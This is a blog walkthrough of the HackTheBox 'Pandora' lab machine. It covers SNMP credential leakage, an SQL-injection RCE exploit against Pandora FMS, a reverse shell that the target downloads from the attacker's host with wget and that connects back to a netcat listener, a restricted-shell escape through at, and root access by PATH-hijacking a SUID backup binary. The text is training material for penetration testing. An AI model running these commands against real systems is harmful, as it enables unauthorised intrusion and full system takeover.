HackTheBox – Pandora Write-up

Hi everyone! Today’s write-up is on Pandora, an easy GNU/Linux machine released on 10th January 2022. I won’t say the machine is easy if you are those who build the SQL injection exploit from scratch. Someone actually build the PoC exploit for an old CVE recently for this HackTheBox challenge so I leached on it. This machine is a good practice for OSCP especially since the foothold of this machine is similar to a retired OSCP exam machine. When I am writing this article, it is not in TJ Null’s OSCP list yet. Maybe it will be added in the future.

To give you a brief overview of this machine, this machine requires enumerating of the SNMP service, pivoting or port forwarding, finding an SQL vulnerability in an internal website, crafting your own SQL injection exploit or using an existing exploit created by someone for this challenge, escape seteuid() privilege escalation restriction due to old version of libapache2-mpm-itk used by the Apache2 service in the machine, and finally privilege escalation using path hijacking of a SUID program. Let’s get started!

Nmap enumeration

kali@kali~$ IP=10.10.11.136
kali@kali~$ sudo nmap -n -p- $IP
...
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

kali@kali~$ sudo nmap -sC -sV -p22,80 $IP
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SNMP enumeration

kali@kali~$ snmp-check $IP
...
[*] Processes:

  Id                    Status                Name                  Path                  Parameters
...
845                   runnable              sh                    /bin/sh               -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'

Via the SNMP service, we are able to find credentials placed on the command line in one of the processes.

SSH into the machine

As we have the credential, we can try to SSH into the machine since SSH service is available.

kali@kali~$ ssh daniel@$IP
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ECDSA key fingerprint is SHA256:9urFJN3aRYRRc9S5Zc+py/w4W6hmZ+WLg6CyrY+5MDI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ECDSA) to the list of known hosts.
daniel@10.10.11.136's password: HotelBabylon23
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 30 Jan 08:32:05 UTC 2022

  System load:  0.0               Processes:             444
  Usage of /:   72.3% of 4.87GB   Users logged in:       1
  Memory usage: 23%               IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

daniel@pandora:~$ 

Access matt’s account

If we look at matt’s home directory, we can see the user flag file is there but is only readable by root or matt’s account.

daniel@pandora:~$ ls /home
daniel  matt
daniel@pandora:~$ ls -l /home/matt/
-rw-r----- 1 root matt 33 Jan 30 08:44 user.txt

Discovering localhost web service

Checking out the /var/www folder, I see another directory called “pandora” while the “html” folder contains the not interesting public-facing website which we already saw the service on Nmap enumeration. This can be further verified by seeing the configuration file.

daniel@pandora:~$ cd /var/www
daniel@pandora:/var/www$ ls
html  pandora
daniel@pandora:/var/www$ ls /etc/apache2/sites-available/
000-default.conf  default-ssl.conf  pandora.conf
daniel@pandora:/var/www$ cat /etc/apache2/sites-available/pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

We can see that it is only accessible via localhost. Besides that, the assigned user is matt.

Pivoting and accessing the internal website

We can use SSH port forwarding to do so.

kali@kali~$ ssh daniel@$IP -L 80:localhost:80
daniel@10.10.11.136's password: HotelBabylon23

This allows us to access the internal website.

The bottom of the website shows us that the website is running on version v7.0NG.742_FIX_PERL2020. A quick Google allows us to find vulnerabilities on the website here as well as unauthenticated SQL injection exploit here.

Remote Code Execution (RCE)

Firstly, we need to download the exploit recently done by someone. Of course you can choose to read the article and come up with your own exploit.

kali@kali~$ git clone https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git

Finally, we can run the exploit using Python3. We will receive a “shell” which is actually just Remote Code Execution (RCE).

kali@kali~$ cd Pandora_v7.0NG.742_exploit_unauthenticated
kali@kali:Pandora_v7.0NG.742_exploit_unauthenticated$ python3 sqlpwn.py -t localhost
URL:  http://localhost/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : j8cgngqha6bemscvkv72iv2rfr
[+] Sending Payload 
[+] Respose : 200
[+] Pwned 🙂
[+] If you want manual Control : http://localhost/pandora_console/images/pwn.php?test=
CMD > whoami
matt

CMD > 

Understanding RCE Exploit (optional)

Following the OSCP way, we will need to obtain a reverse shell as RCE is not allowed. Hence, we first need to see what architecture is the machine using.

CMD > uname -a
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Since we now know it is a 64-bits machine, we can generate a reverse shell using msfvenom. Remember to change the LHOST to your own machine’s IP address. We can host an HTTP server so that the machine can download it from our Kali using wget. Not sure why port 22 doesn’t work. I guess the IP table must have restricted outbound traffic to only allow probably port 80 and 443.

kali@kali~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.49 LPORT=443 -f elf > shellx64.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
kali@kali~$ sudo python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ... 

Download it using the RCE “shell”. We must change its permission before executing it later.

CMD > wget http://10.10.14.49:443/shellx64.elf -O /tmp/shellx64.elf
CMD > chmod 755 /tmp/shellx64.elf

CMD > ls -l /tmp
total 8
-rwxr-xr-x 1 matt matt 194 Jan 30 16:56 shellx64.elf
-rwxrwxrwx 1 matt matt  10 Jan 30 13:00 tar

Close the HTTP server and use Netcat to listen for an incoming reverse shell connection.

kali@kali~$ nc -lvnp
listening on [any] 443 ...

Finally, we can execute the file using the “RCE” shell. Our Netcat should receive a shell. I made the shell TTY.

CMD > /tmp/shellx64.elf
kali@kali~$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.49] from (UNKNOWN) [10.10.11.136] 51122
python3 -c 'import pty; pty.spawn("/bin/bash")'
matt@pandora:/var/www/pandora/pandora_console/images$ 

Obtaining user flag

matt@pandora:/var/www/pandora/pandora_console/images$ cd /home/matt
matt@pandora:/home/matt$ ls
user.txt
matt@pandora:/home/matt$ cat user.txt
36f**************************

Privilege escalation

SUID

When searching for SUID programs, I notice an interesting SUID program related to the website’s name.

matt@pandora:/home/matt$ find / -perm /4000 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

When I tried to run the file, I was greeted with an error message.

matt@pandora:/home/matt$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!

When I try to read the file content, I noticed a string with the full command of what the program is running.

matt@pandora:/home/matt$ hexdump -C /usr/bin/pandora_backup
...
00002000  01 00 02 00 00 00 00 00  50 61 6e 64 6f 72 61 46  |........PandoraF|
00002010  4d 53 20 42 61 63 6b 75  70 20 55 74 69 6c 69 74  |MS Backup Utilit|
00002020  79 00 00 00 00 00 00 00  4e 6f 77 20 61 74 74 65  |y.......Now atte|
00002030  6d 70 74 69 6e 67 20 74  6f 20 62 61 63 6b 75 70  |mpting to backup|
00002040  20 50 61 6e 64 6f 72 61  46 4d 53 20 63 6c 69 65  | PandoraFMS clie|
00002050  6e 74 00 00 00 00 00 00  74 61 72 20 2d 63 76 66  |nt......tar -cvf|
00002060  20 2f 72 6f 6f 74 2f 2e  62 61 63 6b 75 70 2f 70  | /root/.backup/p|
00002070  61 6e 64 6f 72 61 2d 62  61 63 6b 75 70 2e 74 61  |andora-backup.ta|
00002080  72 2e 67 7a 20 2f 76 61  72 2f 77 77 77 2f 70 61  |r.gz /var/www/pa|
00002090  6e 64 6f 72 61 2f 70 61  6e 64 6f 72 61 5f 63 6f  |ndora/pandora_co|
000020a0  6e 73 6f 6c 65 2f 2a 00  42 61 63 6b 75 70 20 66  |nsole/*.Backup f|
000020b0  61 69 6c 65 64 21 0a 43  68 65 63 6b 20 79 6f 75  |ailed!.Check you|
000020c0  72 20 70 65 72 6d 69 73  73 69 6f 6e 73 21 00 42  |r permissions!.B|
000020d0  61 63 6b 75 70 20 73 75  63 63 65 73 73 66 75 6c  |ackup successful|
000020e0  21 00 54 65 72 6d 69 6e  61 74 69 6e 67 20 70 72  |!.Terminating pr|
000020f0  6f 67 72 61 6d 21 00 00  01 1b 03 3b 3c 00 00 00  |ogram!.....;<...|
00002100  06 00 00 00 28 ef ff ff  88 00 00 00 88 ef ff ff  |....(...........|

Based on the command, tar is being executed but its full path is not stated. As a result, we can do a path hijacking.

Fixing seteuid()

While doing path hijacking, I stumble across an issue where /usr/bin/pandora_backup is not running as root. If we run “sudo -l” we will realized there is an error.

matt@pandora:/var/www/pandora/pandora_console/DEBIAN$ sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin

A quick Google allows me to find out an old package of libapache2-mpm-itk breaks syscall functions like seteuid(). You can see articles about them in this StackOverflow post and official bug report. Looking at the machine’s apache2 library, we can see it is using a late 2013 mpm-itk package that has this bug.

matt@pandora:/home/matt$ find / -name libapache2-mpm-itk 2>/dev/null
/usr/share/doc/libapache2-mpm-itk
matt@pandora:/home/matt$ ls /usr/share/doc/libapache2-mpm-itk
README.Debian  changelog.Debian.gz  copyright
matt@pandora:/home/matt$ cat /usr/share/doc/libapache2-mpm-itk/README*
mpm-itk for Debian
------------------

Note that mpm-itk has gone from being a true MPM to just being a module
that hooks into prefork. You can safely remove the old apache2-mpm-itk
package if you still have it installed.

 -- Steinar H. Gunderson <sesse@debian.org>  Thu, 07 Nov 2013 20:16:19 +0100

Thus, we can break out of the restricted environment using at command by copying and pasting the full command with arguments from GTFObins here.

matt@pandora:/home/matt$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 4 at Mon Jan 31 03:13:00 2022
/bin/sh: 0: can't access tty; job control turned off
$ 

Path hijacking

In the SSH session in Daniel’s account, use nano to create a file in Daniel’s home directory. Somehow my reverse shell is having a hard time creating the exploit file. Thus, using the SSH session is easier.

dnaiel@pandora:~$ mkdir spoiler
daniel@pandora:~$
cd spoiler/ daniel@pandora:~/spoiler$ nano tar

In the tar file, I copy the bash file and make it SUID so that I don’t need another reverse shell which is troublesome.

#!/bin/bash

cp /bin/bash /home/matt/bash
chmod u+s /home/matt/bash

Once saved the file, change the permission to allow everyone to execute.

daniel@pandora:~/spoiler$ chmod 777 tar

Finally, change the environmental PATH to daniel’s home directory before executing it.

$ export PATH="/home/daniel/spoiler:$PATH"
$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
Backup successful!
Terminating program!
$ ls -l
total 1160
-rwsr-xr-x 1 root matt 1183448 Jan 31 03:15 bash
-rw-r----- 1 root matt      33 Jan 30 08:44 user.txt

Spawn root shell

Since bash’s owner is now root with SUID set, we can spawn it as root.

$ ./bash -p
bash: cannot set terminal process group (833): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0# id
uid=1000(matt) gid=1000(matt) euid=0(root) groups=1000(matt)
bash-5.0# 

Obtaining root flag

bash-5.0# cd /root
bash-5.0# ls    
root.txt
bash-5.0# cat root.txt
d94****************************

I hope these tabs have been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.